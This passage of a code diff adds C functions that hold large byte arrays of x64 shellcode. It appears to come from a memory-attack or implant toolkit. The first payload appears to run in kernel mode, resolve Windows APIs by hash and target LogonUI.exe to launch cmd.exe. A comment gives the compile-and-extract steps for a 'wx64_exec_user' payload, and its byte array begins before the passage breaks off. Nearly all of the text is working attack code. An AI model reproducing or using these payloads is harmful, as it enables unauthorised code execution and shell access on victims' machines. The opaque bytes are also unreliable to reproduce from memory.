+ 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20, 0x02, 0x00,
+ 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0xe9, 0xc1, 0x01, 0x00, 0x00, 0xba, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4d, 0xf7, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xba, 0x10, 0x00, 0x00,
+ 0x00, 0x48, 0x8d, 0x4d, 0x9f, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x4c,
+ 0x21, 0x75, 0xa7, 0x4c, 0x8d, 0x4d, 0x9f, 0x4c, 0x8d, 0x45, 0xf7, 0x4c,
+ 0x89, 0x7d, 0x9f, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x8d, 0x4d, 0x67,
+ 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48, 0x63, 0xc8, 0x8b, 0xc1, 0x41,
+ 0x23, 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20, 0x02,
+ 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
+ 0x00, 0xe9, 0x45, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x67, 0x4c, 0x8d,
+ 0x4d, 0x97, 0xc7, 0x44, 0x24, 0x28, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x55, 0x77, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
+ 0x00, 0x30, 0x00, 0x00, 0xff, 0x57, 0x78, 0x48, 0x63, 0xc8, 0x8b, 0xc1,
+ 0x41, 0x23, 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20,
+ 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x05, 0x00,
+ 0x00, 0x00, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x7f, 0x48,
+ 0x8d, 0x55, 0xb7, 0xff, 0x57, 0x18, 0x4c, 0x39, 0xb3, 0x30, 0x01, 0x00,
+ 0x00, 0x74, 0x38, 0x4c, 0x8b, 0xc7, 0x48, 0x8b, 0xd6, 0x48, 0x8b, 0xcb,
+ 0xe8, 0x3f, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75,
+ 0x22, 0x48, 0xc7, 0x83, 0x20, 0x02, 0x00, 0x00, 0x05, 0x40, 0x00, 0x80,
+ 0x48, 0x8d, 0x4d, 0xb7, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x06,
+ 0x00, 0x00, 0x00, 0xff, 0x57, 0x20, 0xe9, 0xb0, 0x00, 0x00, 0x00, 0x4c,
+ 0x8b, 0x4d, 0x77, 0x4c, 0x8b, 0xc7, 0x48, 0x8b, 0xd6, 0x4c, 0x89, 0x74,
+ 0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0x16, 0x03, 0x00, 0x00, 0x8b, 0xc8,
+ 0x41, 0x23, 0xcd, 0x41, 0x3b, 0xcd, 0x48, 0x8d, 0x4d, 0xb7, 0x75, 0x16,
+ 0x48, 0x98, 0x48, 0x89, 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83,
+ 0x28, 0x02, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xeb, 0xbd, 0xff, 0x57,
+ 0x20, 0x4c, 0x8b, 0x57, 0x68, 0x4d, 0x85, 0xd2, 0x74, 0x69, 0x48, 0x8b,
+ 0x4d, 0x67, 0x48, 0x8d, 0x45, 0xe7, 0x48, 0x89, 0x44, 0x24, 0x48, 0x45,
+ 0x33, 0xc9, 0x48, 0x8d, 0x45, 0xaf, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x44,
+ 0x24, 0x40, 0x33, 0xd2, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x48, 0x8b,
+ 0x45, 0x77, 0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x83, 0x64, 0x24, 0x28,
+ 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x41, 0xff, 0xd2, 0x8b, 0xc8,
+ 0x41, 0x23, 0xcd, 0x41, 0x3b, 0xcd, 0x75, 0x16, 0x48, 0x98, 0x48, 0x89,
+ 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00,
+ 0x0a, 0x00, 0x00, 0x00, 0xeb, 0x0d, 0xba, 0xfa, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xce, 0xe8, 0x61, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x67, 0x48,
+ 0x85, 0xc9, 0x74, 0x06, 0xff, 0x96, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
+ 0x4d, 0x7f, 0x48, 0x85, 0xc9, 0x74, 0x03, 0xff, 0x57, 0x48, 0x48, 0x81,
+ 0xc4, 0xe0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x5f,
+ 0x5e, 0x5b, 0x5d, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c,
+ 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83,
+ 0xec, 0x40, 0x4c, 0x8b, 0xe2, 0x48, 0x8b, 0xf1, 0x33, 0xd2, 0x4d, 0x8b,
+ 0xf1, 0x4d, 0x8b, 0xf8, 0x4c, 0x8d, 0x4c, 0x24, 0x70, 0x45, 0x33, 0xc0,
+ 0x8d, 0x5a, 0x05, 0x8b, 0xcb, 0xff, 0x96, 0xa8, 0x00, 0x00, 0x00, 0x3d,
+ 0x04, 0x00, 0x00, 0xc0, 0x0f, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x8b, 0x4c,
+ 0x24, 0x70, 0x85, 0xc9, 0x0f, 0x84, 0xa6, 0x00, 0x00, 0x00, 0x8b, 0xd1,
+ 0x33, 0xc9, 0xff, 0x56, 0x08, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75,
+ 0x0a, 0xb8, 0x0e, 0x00, 0x07, 0x80, 0xe9, 0x8d, 0x00, 0x00, 0x00, 0x44,
+ 0x8b, 0x44, 0x24, 0x70, 0x4c, 0x8d, 0x4c, 0x24, 0x70, 0x48, 0x8b, 0xd7,
+ 0x8b, 0xcb, 0xff, 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xc0,
+ 0x78, 0x6a, 0x48, 0x8b, 0xdf, 0xba, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8d,
+ 0x4c, 0x24, 0x30, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x43,
+ 0x50, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00,
+ 0x48, 0x89, 0x44, 0x24, 0x20, 0x49, 0x8b, 0xd4, 0x48, 0x8b, 0xce, 0xe8,
+ 0x5c, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8d, 0x4c, 0x24, 0x30,
+ 0xff, 0x16, 0x85, 0xc0, 0x74, 0x23, 0x8b, 0x03, 0x85, 0xc0, 0x74, 0x16,
+ 0x48, 0x03, 0xd8, 0x48, 0x3b, 0xdf, 0x72, 0x1c, 0x8b, 0x44, 0x24, 0x70,
+ 0x48, 0x03, 0xc7, 0x48, 0x3b, 0xd8, 0x73, 0x10, 0xeb, 0xa7, 0xbd, 0x9f,
+ 0x13, 0x07, 0x80, 0xeb, 0x07, 0x48, 0x8b, 0x43, 0x50, 0x49, 0x89, 0x06,
+ 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x10, 0x8b, 0xc5, 0x4c, 0x8d, 0x5c, 0x24,
+ 0x40, 0x49, 0x8b, 0x5b, 0x38, 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3,
+ 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5c, 0x5f, 0x5e, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57,
+ 0x41, 0x56, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf1,
+ 0x48, 0x8d, 0x54, 0x24, 0x48, 0x49, 0x8b, 0xc8, 0x49, 0x8b, 0xe9, 0xff,
+ 0x56, 0x58, 0x8b, 0xf8, 0x85, 0xc0, 0x78, 0x23, 0x48, 0x8b, 0x4c, 0x24,
+ 0x48, 0xff, 0x56, 0x50, 0x48, 0x8b, 0xc8, 0x48, 0x8b, 0xd5, 0x48, 0x8b,
+ 0xd8, 0xff, 0x56, 0x70, 0x48, 0x8b, 0x4c, 0x24, 0x60, 0x48, 0x8b, 0xd3,
+ 0x4c, 0x8b, 0xc0, 0x41, 0xff, 0x56, 0x60, 0x48, 0x8b, 0x5c, 0x24, 0x40,
+ 0x8b, 0xc7, 0x48, 0x8b, 0x6c, 0x24, 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41,
+ 0x5e, 0x5f, 0x5e, 0xc3, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+ 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c, 0x89, 0x70, 0x20, 0x55,
+ 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x70, 0x4c, 0x8b, 0xf1, 0xc7, 0x45,
+ 0xb0, 0x5d, 0xc6, 0x94, 0xfb, 0xc7, 0x45, 0xb4, 0xa3, 0x8d, 0x98, 0x2b,
+ 0x48, 0x8d, 0xba, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8, 0xf9, 0x95,
+ 0xc6, 0x88, 0x48, 0x8d, 0x75, 0xf4, 0xc7, 0x45, 0xbc, 0xbe, 0x47, 0x00,
+ 0x9e, 0xbb, 0x11, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xc0, 0xf4, 0xdc, 0x47,
+ 0xf0, 0xc7, 0x45, 0xc4, 0xbc, 0x1e, 0x36, 0x9f, 0xc7, 0x45, 0xc8, 0x92,
+ 0xf5, 0x45, 0x13, 0xc7, 0x45, 0xcc, 0xcd, 0x1d, 0xeb, 0xbc, 0xc7, 0x45,
+ 0xd0, 0x2b, 0x0e, 0xd0, 0x97, 0xc7, 0x45, 0xd4, 0xd6, 0x3f, 0x05, 0x2e,
+ 0xc7, 0x45, 0xd8, 0xec, 0xee, 0xe7, 0x8b, 0xc7, 0x45, 0xdc, 0x2a, 0xb8,
+ 0xa0, 0xa3, 0xc7, 0x45, 0xe0, 0x0d, 0x0e, 0x0b, 0x0e, 0xc7, 0x45, 0xe4,
+ 0x41, 0x20, 0x2f, 0x44, 0xc7, 0x45, 0xe8, 0xa8, 0x3b, 0xfb, 0xe0, 0xc7,
+ 0x45, 0xec, 0xed, 0x4a, 0x3d, 0xd3, 0xc7, 0x45, 0xf0, 0x60, 0x9d, 0xd0,
+ 0xf0, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce, 0x8b, 0x16, 0x48, 0x8d,
+ 0x7f, 0xf8, 0xe8, 0x49, 0x04, 0x00, 0x00, 0x48, 0x89, 0x07, 0x83, 0xc3,
+ 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x5c, 0x24, 0x70, 0x49, 0x8b, 0x5b, 0x10,
+ 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28,
+ 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
+ 0x89, 0x78, 0x20, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec,
+ 0x20, 0x4c, 0x8b, 0x71, 0x68, 0x4c, 0x8d, 0xa1, 0x00, 0x04, 0x00, 0x00,
+ 0x4c, 0x89, 0xb1, 0x80, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc6, 0x25, 0xff,
+ 0x0f, 0x00, 0x00, 0x41, 0xbf, 0x00, 0x10, 0x00, 0x00, 0x44, 0x2b, 0xf8,
+ 0x48, 0x8b, 0xfa, 0x4c, 0x89, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x48, 0xb8,
+ 0x66, 0x66, 0x77, 0x77, 0x66, 0x66, 0x77, 0x77, 0x48, 0x89, 0x41, 0x78,
+ 0x48, 0x8b, 0xd9, 0x49, 0x8b, 0x06, 0xba, 0x04, 0x01, 0x00, 0x00, 0x48,
+ 0x89, 0x81, 0x88, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xe9, 0x49, 0x8b, 0xcc,
+ 0x41, 0xff, 0x50, 0x70, 0x48, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x57, 0x00,
+ 0x07, 0x80, 0xeb, 0x47, 0xba, 0x00, 0x10, 0x00, 0x00, 0x48, 0x8b, 0xcd,
+ 0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xc7, 0x49, 0x8b, 0xd6,
+ 0x48, 0x8b, 0xcd, 0xff, 0x57, 0x60, 0x41, 0xb8, 0x04, 0x01, 0x00, 0x00,
+ 0x48, 0x8d, 0x8d, 0xe8, 0x0e, 0x00, 0x00, 0x49, 0x8b, 0xd4, 0xff, 0x57,
+ 0x60, 0x8b, 0x83, 0x28, 0x01, 0x00, 0x00, 0x89, 0x85, 0xf8, 0x0f, 0x00,
+ 0x00, 0x48, 0x8b, 0x44, 0x24, 0x60, 0x48, 0x89, 0x85, 0xf0, 0x0f, 0x00,
+ 0x00, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24,
+ 0x48, 0x48, 0x8b, 0x74, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x48,
+ 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5c, 0xc3, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x41, 0x56, 0x48, 0x83, 0xec,
+ 0x30, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xe9, 0x41, 0xbe, 0x00, 0x20, 0x00,
+ 0x00, 0x33, 0xc9, 0x41, 0x8b, 0xd6, 0x49, 0x8b, 0xf0, 0xff, 0x53, 0x08,
+ 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x07, 0x33, 0xc0, 0xe9, 0x90,
+ 0x00, 0x00, 0x00, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0x80,
+ 0x00, 0x00, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x45, 0x33, 0xc9,
+ 0x45, 0x33, 0xc0, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x16, 0x4c,
+ 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x08, 0x48, 0x8b, 0xcf, 0xff, 0x53,
+ 0x10, 0xeb, 0xc9, 0x33, 0xd2, 0x49, 0x8b, 0xce, 0x44, 0x8d, 0x42, 0x02,
+ 0xff, 0x56, 0x40, 0x45, 0x33, 0xc9, 0xc7, 0x44, 0x24, 0x28, 0x10, 0x00,
+ 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x49, 0x8b, 0xce, 0x45, 0x8d,
+ 0x41, 0x01, 0x41, 0x8a, 0xd0, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xf0, 0x48,
+ 0x85, 0xc0, 0x74, 0xc7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x30, 0x48, 0x8d,
+ 0x8e, 0x00, 0x10, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00,
+ 0xff, 0x53, 0x30, 0x48, 0x89, 0x85, 0x18, 0x02, 0x00, 0x00, 0x48, 0x8b,
+ 0xc6, 0x48, 0x89, 0xbd, 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0xb5, 0x38,
+ 0x02, 0x00, 0x00, 0x48, 0x8b, 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24,
+ 0x48, 0x48, 0x8b, 0x74, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x48,
+ 0x83, 0xc4, 0x30, 0x41, 0x5e, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+ 0x08, 0x55, 0x48, 0x8d, 0xac, 0x24, 0x50, 0xff, 0xff, 0xff, 0x48, 0x81,
+ 0xec, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x48, 0x8d, 0x55, 0xe0,
+ 0x48, 0x8b, 0x49, 0x08, 0xe8, 0x13, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4b,
+ 0x08, 0x48, 0x8d, 0x54, 0x24, 0x50, 0xe8, 0x1d, 0xfd, 0xff, 0xff, 0xb8,
+ 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x4c, 0x6f, 0x67, 0x6f,
+ 0x4c, 0x8d, 0x8b, 0x20, 0x01, 0x00, 0x00, 0x48, 0x89, 0x83, 0x30, 0x01,
+ 0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89, 0x83, 0x40, 0x01,
+ 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x24, 0x6e,
+ 0x55, 0x49, 0x2e, 0x48, 0x8d, 0x4d, 0xe0, 0xc7, 0x44, 0x24, 0x28, 0x65,
+ 0x78, 0x65, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x63, 0x3a, 0x5c, 0x77, 0xc7,
+ 0x44, 0x24, 0x34, 0x69, 0x6e, 0x64, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x77,
+ 0x73, 0x5c, 0x73, 0xc7, 0x44, 0x24, 0x3c, 0x79, 0x73, 0x74, 0x65, 0xc7,
+ 0x44, 0x24, 0x40, 0x6d, 0x33, 0x32, 0x5c, 0xc7, 0x44, 0x24, 0x44, 0x63,
+ 0x6d, 0x64, 0x2e, 0xc7, 0x44, 0x24, 0x48, 0x65, 0x78, 0x65, 0x00, 0x48,
+ 0xc7, 0x83, 0x28, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xe8, 0x21,
+ 0xfb, 0xff, 0xff, 0x48, 0x63, 0xc8, 0x48, 0x89, 0x8b, 0x20, 0x02, 0x00,
+ 0x00, 0x85, 0xc0, 0x74, 0x0d, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00,
+ 0x01, 0x01, 0x00, 0x00, 0xeb, 0x26, 0x48, 0x8d, 0x8b, 0x00, 0x04, 0x00,
+ 0x00, 0x41, 0xb8, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30,
+ 0xff, 0x55, 0x40, 0x4c, 0x8d, 0x44, 0x24, 0x50, 0x48, 0x8b, 0xcb, 0x48,
+ 0x8d, 0x55, 0xe0, 0xe8, 0x98, 0xf8, 0xff, 0xff, 0x48, 0x8b, 0x9c, 0x24,
+ 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x01, 0x00, 0x00, 0x5d,
+ 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x8b, 0xc2, 0x4c, 0x8d,
+ 0x44, 0x24, 0x30, 0x48, 0x69, 0xd0, 0xf0, 0xd8, 0xff, 0xff, 0x4c, 0x8b,
+ 0xc9, 0x33, 0xc9, 0x48, 0x89, 0x54, 0x24, 0x30, 0x33, 0xd2, 0x41, 0xff,
+ 0x51, 0x20, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
+ 0x89, 0x70, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90,
+ 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b,
+ 0xd7, 0xc7, 0x45, 0xeb, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8,
+ 0x00, 0x00, 0x00, 0xc7, 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d,
+ 0x75, 0x4b, 0xc7, 0x45, 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00,
+ 0x00, 0x00, 0xc7, 0x45, 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb,
+ 0xce, 0xad, 0x90, 0x4d, 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7,
+ 0x45, 0x03, 0x8f, 0xb5, 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd,
+ 0x05, 0xc7, 0x45, 0x0b, 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9,
+ 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45,
+ 0x17, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8,
+ 0xc7, 0x45, 0x1f, 0x3d, 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0,
+ 0x35, 0x30, 0xc7, 0x45, 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b,
+ 0x61, 0x4c, 0x04, 0x5d, 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7,
+ 0x45, 0x33, 0xb8, 0xd4, 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0,
+ 0x6f, 0xc7, 0x45, 0x3b, 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde,
+ 0x24, 0xe6, 0xf7, 0xc7, 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45,
+ 0x47, 0x36, 0x31, 0x0e, 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce,
+ 0x8b, 0x16, 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48,
+ 0x89, 0x07, 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90,
+ 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
+ 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9,
+ 0x74, 0x7a, 0xb8, 0x4d, 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70,
+ 0x48, 0x63, 0x41, 0x3c, 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50,
+ 0x45, 0x00, 0x00, 0x75, 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
+ 0x03, 0xd1, 0x74, 0x54, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74,
+ 0x4b, 0x8b, 0x42, 0x20, 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c,
+ 0x8d, 0x0c, 0x01, 0x8b, 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9,
+ 0x45, 0x33, 0xc0, 0x45, 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c,
+ 0x03, 0xd1, 0x33, 0xdb, 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2,
+ 0xc1, 0xcb, 0x0d, 0x03, 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee,
+ 0x3b, 0xdd, 0x74, 0x23, 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45,
+ 0x3b, 0xc3, 0x72, 0xd4, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48,
+ 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c,
+ 0x24, 0x20, 0xc3, 0x46, 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14,
+ 0x73, 0xde, 0x42, 0x8b, 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7
+ };
+ *ppb = WINX64_PSCMD_KERNEL_BIN;
+ *pcb = sizeof(WINX64_PSCMD_KERNEL_BIN);
+}
+
+// standard wx64_exec_user payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC wx64_exec_user_c.c
+// ml64 wx64_exec_user.asm /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_exec_user_c.obj
+// shellcode64.exe -o wx64_exec_user.exe
+// xxd -i wx64_exec_user.bin
+VOID GetData_PSCMD_USER(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_PSCMD_USER_BIN[] = {
+ 0xb0, 0x00, 0xb2, 0x01, 0x48, 0x8d, 0x0d, 0x49, 0x00, 0x00, 0x00, 0xf0,
+ 0x0f, 0xb0, 0x11, 0x75, 0x42, 0x48, 0x8d, 0x0d, 0xe8, 0xff, 0xff, 0xff,
+ 0x48, 0x81, 0xe1, 0x00, 0xf0, 0xff, 0xff, 0x65, 0x48, 0x8b, 0x14, 0x25,
+ 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18,
+ 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x12, 0x48, 0x8b, 0x12, 0x48, 0x8b,
+ 0x52, 0x20, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83,
+ 0xec, 0x20, 0xe8, 0xe1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3,
+ 0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+ 0x24, 0x10, 0x48, 0x89, 0x7c, 0x24, 0x18, 0x48, 0x63, 0x41, 0x3c, 0x4c,
+ 0x8b, 0xc9, 0x8b, 0xf2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00,
+ 0x4c, 0x03, 0xc1, 0x45, 0x8b, 0x50, 0x20, 0x45, 0x8b, 0x58, 0x24, 0x4c,
+ 0x03, 0xd1, 0x41, 0x8b, 0x58, 0x1c, 0x4c, 0x03, 0xd9, 0x41, 0x8b, 0x78,
+ 0x18, 0x48, 0x03, 0xd9, 0x33, 0xc9, 0x85, 0xff, 0x74, 0x2d, 0x41, 0x8b,
+ 0x12, 0x49, 0x03, 0xd1, 0x45, 0x33, 0xc0, 0xeb, 0x0d, 0x0f, 0xb6, 0xc0,
+ 0x48, 0xff, 0xc2, 0x41, 0xc1, 0xc8, 0x0d, 0x44, 0x03, 0xc0, 0x8a, 0x02,
+ 0x84, 0xc0, 0x75, 0xed, 0x44, 0x3b, 0xc6, 0x74, 0x1c, 0xff, 0xc1, 0x49,
+ 0x83, 0xc2, 0x04, 0x3b, 0xcf, 0x72, 0xd3, 0x33, 0xc0, 0x48, 0x8b, 0x5c,
+ 0x24, 0x08, 0x48, 0x8b, 0x74, 0x24, 0x10, 0x48, 0x8b, 0x7c, 0x24, 0x18,
+ 0xc3, 0x41, 0x0f, 0xb7, 0x0c, 0x4b, 0x8b, 0x04, 0x8b, 0x49, 0x03, 0xc1,
+ 0xeb, 0xe3, 0xcc, 0xcc, 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
+ 0x41, 0x78, 0x48, 0x8b, 0xd9, 0x33, 0xc9, 0x48, 0x89, 0x08, 0x39, 0x8b,
+ 0x88, 0x00, 0x00, 0x00, 0x74, 0x22, 0x89, 0x8b, 0x88, 0x00, 0x00, 0x00,
